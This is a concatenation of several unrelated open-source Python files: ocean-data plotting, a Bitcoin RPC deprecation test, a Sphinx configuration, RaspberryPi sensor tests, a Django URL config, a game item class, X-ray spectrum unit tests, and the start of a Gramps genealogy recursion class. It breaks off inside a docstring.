                        plt.plot(self.forecast_data[i, idx, :], self.depths[i], form)
                    )
                    legend.append(f"{id_label} {giops_name}")
                    for j, model_name in enumerate(self.additional_model_names):
                        handles.append(
                            plt.plot(
                                self.additional_model_data[j, i, idx, :],
                                self.depths[i],
                                form,
                            )
                        )
                        legend.append(f"{id_label} {model_name}")
                    if self.climatology:
                        handles.append(
                            plt.plot(
                                self.climatology_data[i, idx, :], self.depths[i], form
                            )
                        )
                        legend.append(f"{id_label} {gettext('Climatology')}")
                    plt.xlim([np.floor(plt.xlim()[0]), np.ceil(plt.xlim()[1])])
            # Values on top, depth increasing downward (oceanographic style).
            plt.gca().xaxis.set_label_position("top")
            plt.gca().xaxis.set_ticks_position("top")
            plt.xlabel(f"{v} ({utils.mathtext(self.variable_units[idx])})", fontsize=14)
            plt.gca().invert_yaxis()
            # NOTE(review): gettext() on an f-string result cannot be found by
            # translation extraction tools -- confirm this is intentional.
            plt.ylabel(
                gettext(f"Depth ({utils.mathtext(self.depth_unit)})"), fontsize=14
            )
            plt.grid(True)
        leg = fig.legend(
            [x[0] for x in handles],
            legend,
            loc="lower left",
            bbox_to_anchor=(0.05, 0.05),
        )
        for legobj in leg.legendHandles:
            legobj.set_linewidth(4.0)
        names = [
            "{} ({:0.2f}, {:0.2f})".format(*x)
            for x in zip(self.ids, self.latitude, self.longitude)
        ]
        wrapped_names = "\n".join(wrap(", ".join(names), 60))
        plt.suptitle(f"{wrapped_names}\n{plot_label}", fontsize=15)
        fig.tight_layout(pad=3, w_pad=4)
        fig.subplots_adjust(top=0.85)
        return super(Class4Plotter, self).plot(fig)
| DFO-Ocean-Navigator/Ocean-Data-Map-Project | plotting/class4.py | Python | gpl-3.0 | 10,590 |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test deprecation of RPC calls."""
from test_framework.test_framework import BitcoinTestFramework
class DeprecatedRpcTest(BitcoinTestFramework):
    """Functional test comparing a node with and without -deprecatedrpc flags."""
    def set_test_params(self):
        # Node 0 runs with defaults; node 1 re-enables the deprecated
        # validateaddress behaviour via -deprecatedrpc.
        self.num_nodes = 2
        self.setup_clean_chain = True
        self.extra_args = [[], ["-deprecatedrpc=validateaddress"]]
    def run_test(self):
        # This test should be used to verify correct behaviour of deprecated
        # RPC methods with and without the -deprecatedrpc flags. For example:
        #
        # self.log.info("Make sure that -deprecatedrpc=createmultisig allows it to take addresses")
        # assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, [self.nodes[0].getnewaddress()])
        # self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
        self.log.info("Test validateaddress deprecation")
        SOME_ADDRESS = "mnvGjUy3NMj67yJ6gkK5o9e5RS33Z2Vqcu" # This is just some random address to pass as a parameter to validateaddress
        # Without the flag the wallet-related "ismine" field is gone ...
        dep_validate_address = self.nodes[0].validateaddress(SOME_ADDRESS)
        assert "ismine" not in dep_validate_address
        # ... with the flag the deprecated field is still present.
        not_dep_val = self.nodes[1].validateaddress(SOME_ADDRESS)
        assert "ismine" in not_dep_val
# Script entry point.
if __name__ == '__main__':
    DeprecatedRpcTest().main()
| TheBlueMatt/bitcoin | test/functional/rpc_deprecated.py | Python | mit | 1,498 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Streamz documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 12 18:41:31 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.mathjax',
              'sphinx.ext.autosummary', 'sphinx.ext.extlinks', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Streamz'
copyright = '2017, Matthew Rocklin'
author = 'Matthew Rocklin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.1'
# The full version, including alpha/beta/rc tags.
release = '0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
# NOTE(review): recent Sphinx releases warn on language = None and expect a
# string such as 'en' -- confirm against the Sphinx version in use.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# Taken from docs.readthedocs.io:
# on_rtd is whether we are on readthedocs.io
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd:  # only import and set the theme if we're building docs locally
    import sphinx_rtd_theme
    html_theme = 'sphinx_rtd_theme'
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'Streamzdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'Streamz.tex', 'Streamz Documentation',
     'Matthew Rocklin', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'streamz', 'Streamz Documentation',
     [author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'Streamz', 'Streamz Documentation',
     author, 'Streamz', 'One line description of project.',
     'Miscellaneous'),
]
| jrmlhermitte/streamz | docs/source/conf.py | Python | bsd-3-clause | 5,154 |
"""
Tests of RPI-specific functionality (adapters and sensors).
"""
import asyncio
import unittest
import platform
from utils import ValueListSensor
from thingflow.base import Scheduler, SensorAsOutputThing
import thingflow.filters.map
from thingflow.filters.output import output
from thingflow.filters.combinators import passthrough
from utils import StopAfterN
# Hardware detection: the GPIO tests only make sense on an ARM RaspberryPi.
MACHINE=platform.machine()
# Check whether the library for tsl2591 is installed.
# See https://github.com/maxlklaxl/python-tsl2591.git
try:
    import tsl2591
    TSL2591_INSTALLED=True
except:
    # NOTE(review): a bare except also hides unrelated errors (e.g. a broken
    # install); catching ImportError would be more precise.
    TSL2591_INSTALLED=False
# Alternating off/on sample values fed to the scripted sensor in the tests.
values = [
    0,
    1,
    0,
    1,
    0,
    1,
    0
]
@unittest.skipUnless(MACHINE=="armv7l",
                     "Tests are specific to RaspberryPi")
class TestRpi(unittest.TestCase):
    """RaspberryPi-only tests for the GPIO adapter and TSL2591 lux sensor."""
    def test_gpio(self):
        """Drive a GPIO output pin from a scripted on/off sensor stream."""
        import thingflow.adapters.rpi.gpio
        o = thingflow.adapters.rpi.gpio.GpioPinOut()
        sensor_thing = SensorAsOutputThing(ValueListSensor("sensor-1", values))
        # Convert raw readings to booleans, log them, then feed the pin.
        sensor_thing.map(lambda evt: evt.val>0).passthrough(output()).connect(o)
        s = Scheduler(asyncio.get_event_loop())
        s.schedule_periodic(sensor_thing, 1.0)
        s.run_forever()
    @unittest.skipUnless(TSL2591_INSTALLED,
                         "TSL2591 sensor library not installed")
    def test_tsl2591(self):
        """Sample the TSL2591 lux sensor periodically and print the events."""
        import thingflow.sensors.rpi.lux_sensor
        sensor = SensorAsOutputThing(thingflow.sensors.rpi.lux_sensor.LuxSensor())
        s = Scheduler(asyncio.get_event_loop())
        stop = s.schedule_periodic(sensor, 1.0)
        # Stop the scheduler after four samples so the test terminates.
        StopAfterN(sensor, stop, N=4).output()
        s.run_forever()
# Script entry point.
if __name__ == '__main__':
    unittest.main()
| mpi-sws-rse/thingflow-python | tests/test_rpi_adapters.py | Python | apache-2.0 | 1,694 |
"""tsbp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.conf.urls.i18n import i18n_patterns
from django.contrib import admin
# Route the admin site and python-social-auth URLs, wrapped in i18n_patterns
# so every URL carries a language prefix (e.g. /en/admin/).
urlpatterns = i18n_patterns(
    url(r'^admin/', admin.site.urls),
    url('', include('social.apps.django_app.urls', namespace='social')),
)
# HealthPotion.py Health potion item.
# Copyright Kevin Smith 2007.
#
# This file is part of HelHack.
#
# HelHack is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# HelHack is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import curses
from item.Item import Item
class HealthPotion(Item):
    """ Health Potion
    """
    def __init__(self, level):
        # Does not block movement through its tile.
        self.blocking = False
        # NOTE(review): carryable is False for a potion, and "^" is the glyph
        # conventionally used for traps -- confirm these values are intended.
        self.carryable = False
        self.glyph = "^"
        self.colour = curses.COLOR_GREEN
        # Dungeon level this potion belongs to.
        self.level = level
| Kev/helhack | src/item/HealthPotion.py | Python | gpl-3.0 | 973 |
#!/usr/bin/env python
"""
.. py:currentmodule:: pymcxray.FileFormat.Results.test_XraySpectraRegionEmitted
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Tests for the module `XraySpectraRegionEmitted`.
"""
# Script information for the file.
__author__ = "Hendrix Demers (hendrix.demers@mail.mcgill.ca)"
__version__ = "0.1"
__date__ = "Feb 12, 2015"
__copyright__ = "Copyright (c) 2015 Hendrix Demers"
__license__ = "GPL 3"
# Standard library modules.
import unittest
import os.path
# Third party modules.
from nose import SkipTest
# Local modules.
# Project modules
from pymcxray.FileFormat.Results.XraySpectraRegionEmitted import XraySpectraRegionEmitted
# Globals and constants variables.
class TestXraySpectraRegionEmitted(unittest.TestCase):
"""
TestCase class for the module `XraySpectraRegionEmitted`.
"""
    def setUp(self):
        """
        Setup method.

        Resolves the shared test-data directory relative to this file.
        """
        unittest.TestCase.setUp(self)
        self.testDataPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../../test_data/results"))
    def tearDown(self):
        """
        Teardown method.

        No per-test cleanup is needed beyond the base class behaviour.
        """
        unittest.TestCase.tearDown(self)
    def testSkeleton(self):
        """
        First test to check if the testcase is working with the testing framework.
        """
        # Intentionally empty; the commented fail() is kept as a scaffold.
        #self.fail("Test if the testcase is working.")
    def test_readRegion_0_30kV(self):
        """
        Tests for method `readRegion_0`.

        Region 0 of this dataset carries no emitted intensity, so all spectra
        values are expected to be zero.  Skips when the data file is absent.
        """
        filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_0.csv"
        filepath = os.path.join(self.testDataPath, filename)
        if not os.path.isfile(filepath):
            raise SkipTest
        spectra = XraySpectraRegionEmitted()
        spectra.path = self.testDataPath
        spectra.basename = "SimulationNanoparticleAg_Au"
        spectra.read()
        # All four channels share the same 6000-point energy grid.
        self.assertEqual(6000, len(spectra.energies_keV))
        self.assertEqual(6000, len(spectra.total_1_ekeVsr))
        self.assertEqual(6000, len(spectra.characteristic_1_ekeVsr))
        self.assertEqual(6000, len(spectra.bremsstrahlung_1_ekeVsr))
        self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
        self.assertAlmostEqual(29.9975, spectra.energies_keV[-1], 6)
        self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[0], 12)
        self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 12)
        self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 12)
        self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 12)
        self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[0], 12)
        self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 12)
        # Spot checks against known CSV rows (row number, then values).
        # 58 0.2825, 0.0, 0.0, 0.0
        self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
        self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[56], 12)
        self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[56], 12)
        self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[56], 12)
        # 426 2.1225, 1.02186e-006, 8.96679e-007, 1.25179e-007
        self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
        self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[424], 12)
        self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[424], 12)
        self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[424], 12)
        # 598 2.9825, 0.0319011, 0.031818, 8.31376e-005
        self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
        self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[596], 12)
        self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[596], 12)
        self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[596], 12)
        #self.fail("Test if the testcase is working.")
def test_readRegion_1_30kV(self):
    """
    Tests for method `read` with ``regionID=1`` (30 kV Ag/Au simulation).
    """
    # Skip when the reference data file is not available locally.
    filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_1.csv"
    filepath = os.path.join(self.testDataPath, filename)
    if not os.path.isfile(filepath):
        raise SkipTest
    spectra = XraySpectraRegionEmitted()
    spectra.path = self.testDataPath
    spectra.basename = "SimulationNanoparticleAg_Au"
    spectra.read(regionID=1)
    # The 30 kV spectrum has 6000 channels for each curve.
    self.assertEqual(6000, len(spectra.energies_keV))
    self.assertEqual(6000, len(spectra.total_1_ekeVsr))
    self.assertEqual(6000, len(spectra.characteristic_1_ekeVsr))
    self.assertEqual(6000, len(spectra.bremsstrahlung_1_ekeVsr))
    # First/last channel centres and intensities.
    self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
    self.assertAlmostEqual(29.9975, spectra.energies_keV[-1], 6)
    self.assertAlmostEqual(1.29326e-008, spectra.total_1_ekeVsr[0], 12)
    self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 12)
    self.assertAlmostEqual(1.29326e-008, spectra.bremsstrahlung_1_ekeVsr[0], 12)
    self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 12)
    # Spot-check rows from the CSV file (row number, then the 4 columns):
    # 58 0.2825, 1.12879e-006, 0, 1.12879e-006
    self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
    self.assertAlmostEqual(1.12879e-006, spectra.total_1_ekeVsr[56], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[56], 12)
    self.assertAlmostEqual(1.12879e-006, spectra.bremsstrahlung_1_ekeVsr[56], 12)
    # 426 2.1225, 1.02186e-006, 8.96679e-007, 1.25179e-007
    self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
    self.assertAlmostEqual(1.02186e-006, spectra.total_1_ekeVsr[424], 12)
    self.assertAlmostEqual(8.96679e-007, spectra.characteristic_1_ekeVsr[424], 12)
    self.assertAlmostEqual(1.25179e-007, spectra.bremsstrahlung_1_ekeVsr[424], 12)
    # 598 2.9825, 8.64716e-008, 0, 8.64716e-008
    self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
    self.assertAlmostEqual(8.64716e-008, spectra.total_1_ekeVsr[596], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[596], 12)
    self.assertAlmostEqual(8.64716e-008, spectra.bremsstrahlung_1_ekeVsr[596], 12)
    #self.fail("Test if the testcase is working.")
def test_readRegion_2_30kV(self):
    """
    Tests for method `read` with ``regionID=2`` (30 kV Ag/Au simulation).
    """
    # Skip when the reference data file is not available locally.
    filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_2.csv"
    filepath = os.path.join(self.testDataPath, filename)
    if not os.path.isfile(filepath):
        raise SkipTest
    spectra = XraySpectraRegionEmitted()
    spectra.path = self.testDataPath
    spectra.basename = "SimulationNanoparticleAg_Au"
    spectra.read(regionID=2)
    # The 30 kV spectrum has 6000 channels for each curve.
    self.assertEqual(6000, len(spectra.energies_keV))
    self.assertEqual(6000, len(spectra.total_1_ekeVsr))
    self.assertEqual(6000, len(spectra.characteristic_1_ekeVsr))
    self.assertEqual(6000, len(spectra.bremsstrahlung_1_ekeVsr))
    # First/last channel centres and intensities.
    self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
    self.assertAlmostEqual(29.9975, spectra.energies_keV[-1], 6)
    self.assertAlmostEqual(1.47934e-006, spectra.total_1_ekeVsr[0], 12)
    self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 12)
    self.assertAlmostEqual(1.47934e-006, spectra.bremsstrahlung_1_ekeVsr[0], 12)
    self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 12)
    # Spot-check rows from the CSV file:
    # 0.2825, 0.000126745, 0, 0.000126745
    self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
    self.assertAlmostEqual(0.000126745, spectra.total_1_ekeVsr[56], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[56], 12)
    self.assertAlmostEqual(0.000126745, spectra.bremsstrahlung_1_ekeVsr[56], 12)
    # 426 2.1225, 8.165e-005, 0, 8.165e-005
    self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
    self.assertAlmostEqual(8.165e-005, spectra.total_1_ekeVsr[424], 12)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[424], 12)
    self.assertAlmostEqual(8.165e-005, spectra.bremsstrahlung_1_ekeVsr[424], 12)
    # 598 2.9825, 0.0319011, 0.031818, 8.31376e-005
    self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
    self.assertAlmostEqual(0.0319011, spectra.total_1_ekeVsr[596], 12)
    self.assertAlmostEqual(0.031818, spectra.characteristic_1_ekeVsr[596], 12)
    self.assertAlmostEqual(8.31376e-005, spectra.bremsstrahlung_1_ekeVsr[596], 12)
    #self.fail("Test if the testcase is working.")
def test_readRegion_1_200kV(self):
    """
    Tests for method `read` with ``regionID=1`` (200 kV Ag/C simulation).
    """
    # Skip when the reference data file is not available locally.
    filename = "SimulationNanoparticleAg_C_SpectraPerElectron_1_srkeV_Region_1.csv"
    filepath = os.path.join(self.testDataPath, filename)
    if not os.path.isfile(filepath):
        raise SkipTest
    spectra = XraySpectraRegionEmitted()
    spectra.path = self.testDataPath
    spectra.basename = "SimulationNanoparticleAg_C"
    spectra.read(regionID=1)
    # The 200 kV spectrum has 40000 channels for each curve.
    self.assertEqual(40000, len(spectra.energies_keV))
    self.assertEqual(40000, len(spectra.total_1_ekeVsr))
    self.assertEqual(40000, len(spectra.characteristic_1_ekeVsr))
    self.assertEqual(40000, len(spectra.bremsstrahlung_1_ekeVsr))
    # First/last channel centres and intensities.
    self.assertAlmostEqual(0.0025, spectra.energies_keV[0], 6)
    self.assertAlmostEqual(199.998, spectra.energies_keV[-1], 6)
    self.assertAlmostEqual(1.18553e-011, spectra.total_1_ekeVsr[0], 17)
    self.assertAlmostEqual(0.0, spectra.total_1_ekeVsr[-1], 17)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[0], 17)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[-1], 17)
    self.assertAlmostEqual(1.18553e-011, spectra.bremsstrahlung_1_ekeVsr[0], 17)
    self.assertAlmostEqual(0.0, spectra.bremsstrahlung_1_ekeVsr[-1], 17)
    # Spot-check rows from the CSV file:
    # 58 0.2825, 2.11852e-005, 2.11838e-005, 1.33965e-009
    self.assertAlmostEqual(0.2825, spectra.energies_keV[56], 6)
    self.assertAlmostEqual(2.11852e-005, spectra.total_1_ekeVsr[56], 17)
    self.assertAlmostEqual(2.11838e-005, spectra.characteristic_1_ekeVsr[56], 17)
    self.assertAlmostEqual(1.33965e-009, spectra.bremsstrahlung_1_ekeVsr[56], 17)
    # 426 2.1225, 7.34935e-009, 0, 7.34935e-009
    self.assertAlmostEqual(2.1225, spectra.energies_keV[424], 6)
    self.assertAlmostEqual(7.34935e-009, spectra.total_1_ekeVsr[424], 17)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[424], 17)
    self.assertAlmostEqual(7.34935e-009, spectra.bremsstrahlung_1_ekeVsr[424], 17)
    # 598 2.9825, 7.2569e-009, 0, 7.2569e-009
    self.assertAlmostEqual(2.9825, spectra.energies_keV[596], 6)
    self.assertAlmostEqual(7.2569e-009, spectra.total_1_ekeVsr[596], 17)
    self.assertAlmostEqual(0.0, spectra.characteristic_1_ekeVsr[596], 17)
    self.assertAlmostEqual(7.2569e-009, spectra.bremsstrahlung_1_ekeVsr[596], 17)
    #self.fail("Test if the testcase is working.")
def test__indice(self):
    """
    Tests for method `_indice`.
    """
    # Skip when the reference data file is not available locally.
    filename = "SimulationNanoparticleAg_Au_SpectraPerElectron_1_srkeV_Region_1.csv"
    filepath = os.path.join(self.testDataPath, filename)
    if not os.path.isfile(filepath):
        raise SkipTest
    spectra = XraySpectraRegionEmitted()
    spectra.path = self.testDataPath
    spectra.basename = "SimulationNanoparticleAg_Au"
    spectra.read(regionID=1)
    # Energies at or below the first channel boundary map to index 0.
    self.assertEqual(0, spectra._indice(0.0))
    self.assertEqual(0, spectra._indice(0.0024))
    self.assertEqual(0, spectra._indice(0.0025))
    self.assertEqual(0, spectra._indice(0.0026))
    self.assertEqual(0, spectra._indice(0.0049))
    self.assertEqual(0, spectra._indice(0.0050))
    self.assertEqual(1, spectra._indice(0.0051))
    # Arbitrary energies map to the channel covering them.
    self.assertEqual(56, spectra._indice(0.282))
    self.assertEqual(424, spectra._indice(2.123))
    self.assertEqual(596, spectra._indice(2.984))
    self.assertEqual(5999, spectra._indice(29.999))
    self.assertEqual(5999, spectra._indice(30.0))
    # Energies above the 30 kV range must raise IndexError.
    self.assertRaises(IndexError, spectra._indice, 31.0)
    # The value accessors look up the same channel as _indice.
    self.assertAlmostEqual(1.12879e-006, spectra.totalValue_1_ekeVsr(0.282), 12)
    self.assertAlmostEqual(1.02186e-006, spectra.totalValue_1_ekeVsr(2.123), 12)
    self.assertAlmostEqual(8.64716e-008, spectra.totalValue_1_ekeVsr(2.984), 12)
    self.assertAlmostEqual(0.0, spectra.characteristicValue_1_ekeVsr(0.282), 12)
    self.assertAlmostEqual(8.96679e-007, spectra.characteristicValue_1_ekeVsr(2.123), 12)
    self.assertAlmostEqual(0.0, spectra.characteristicValue_1_ekeVsr(2.984), 12)
    self.assertAlmostEqual(1.12879e-006, spectra.bremsstrahlungValue_1_ekeVsr(0.282), 12)
    self.assertAlmostEqual(1.25179e-007, spectra.bremsstrahlungValue_1_ekeVsr(2.123), 12)
    self.assertAlmostEqual(8.64716e-008, spectra.bremsstrahlungValue_1_ekeVsr(2.984), 12)
    # 66.82
    # 66.82 keV is outside the 30 kV spectrum ...
    self.assertRaises(IndexError, spectra._indice, 66.82)
    # ... but valid for the 200 kV (Ag_C) spectrum read below.
    spectra = XraySpectraRegionEmitted()
    spectra.path = self.testDataPath
    spectra.basename = "SimulationNanoparticleAg_C"
    spectra.read(regionID=1)
    self.assertEqual(13363, spectra._indice(66.82))
    self.assertAlmostEqual(0.0, spectra.characteristicValue_1_ekeVsr(66.82), 12)
    #self.fail("Test if the testcase is working.")
if __name__ == '__main__': #pragma: no cover
    # Run this test module through nose when executed directly.
    import nose
    nose.runmodule()
| drix00/pymcxray | pymcxray/FileFormat/Results/test_XraySpectraRegionEmitted.py | Python | apache-2.0 | 13,861 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2015 Craig Anderson
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
""" Recursive base classes for reports
"""
from gramps.gen.plug.report import utils
from gramps.gen.lib import ChildRefType
#------------------------------------------------------------------------
#
# Livrecurse base objects only
#
#------------------------------------------------------------------------
class _PersonSeen:
""" librecurse base boject only
Keep track of people that have been seen so we can call the correct
virtual method.
"""
def __init__(self):
self.people_seen = set()
def add_person(self, level, person_handle, family_handle):
""" a person is seen for the first time """
pass
def add_person_again(self, level, person_handle, family_handle):
""" a person is seen again """
pass
def _add_person(self, level, person_handle, family_handle):
""" Which virtual method to call?
"""
if person_handle is not None and person_handle in self.people_seen:
self.add_person_again(level, person_handle, family_handle)
else:
self.add_person(level, person_handle, family_handle)
if person_handle is not None:
self.people_seen.add(person_handle)
class _FamilySeen:
""" librecurse base boject only
Keep track of the famalies that have been seen so we can call the correct
virtual method.
"""
def __init__(self):
self.families_seen = set()
def add_marriage(self, level, person_handle, family_handle):
""" Makes a marriage """
pass
def add_marriage_again(self, level, person_handle, family_handle):
""" Makes a marriage """
pass
def _add_marriage(self, level, person_handle, family_handle):
""" Makes a marriage """
if family_handle in self.families_seen:
self.add_marriage_again(level, person_handle, family_handle)
else:
self.add_marriage(level, person_handle, family_handle)
self.families_seen.add(family_handle)
class _StopRecurse:
""" A simple class to break out the
. stop_recursion
. can_recurse
. continue_recursion
methods
"""
def __init__(self):
# The default value. Lets recurse.
self.__stop_recursion = False
def stop_recursion(self):
""" Stop Recursion at theis person/family """
self.__stop_recursion = True
def continue_recursion(self):
""" Used to allow recursion again """
self.__stop_recursion = False
def can_recurse(self):
""" Has the upper class told up to stop or can we continue? """
return self.__stop_recursion == False
#------------------------------------------------------------------------
#
# Class DescendPerson
#
#------------------------------------------------------------------------
class DescendPerson(_StopRecurse, _PersonSeen, _FamilySeen):
    """Recursive (down) base class.

    The following methods need to be sub-classed as needed:
    . add_person
    . add_person_again (called when a person is seen a second or more times)
    if you don't want to see marriages don't subclass the following two
    . add_marriage
    . add_marriage_again (when a marriage is seen a second or more times)

    returns:
    . add_person, add_person_again, add_marriage, add_marriage_again return
    . . index -> a tuple in the form
    . . . generation, which generational level >= 1
    . . . level
    . . . . 0 = A direct child
    . . . . 1 = spouse of above (0)
    . . . . 2 = spouse of 1
    . . . . 3 = spouse of 2
    . . . . 4 etc
    . . person_handle
    . . family_handle

    Public variables:
    . families_seen, a set of all families seen.
    . people_seen, a set of all people seen.
    . . useful for knowing if a recursion (kid marrying a grandparent)
    . . has happened.
    These can be edited if needed
    . appending can be useful for excluding parts of the tree

    Methods (tools):
    is_direct_descendant - is this person a direct descendant
    . in the example 'kid 1 of mom and other spouse' is NOT
    stop_recursion - tells the recursion to stop going down
    . mostly used in add_person_again and add_marriage_again
    has_children - checks to see if the person:
    . is NOT already seen and has children.

    Methods (informative)
    . These are the methods that need to be subclassed
    . all methods are given the:
    . . level in (Generation, Spousal level) tuple
    . . person_handle of the person
    . . family_handle of the family
    add_marriage
    add_marriage_again
    Virtual methods in PersonSeen
    . add_person - The recursion found a new person in the tree
    . add_person_again - found a person again
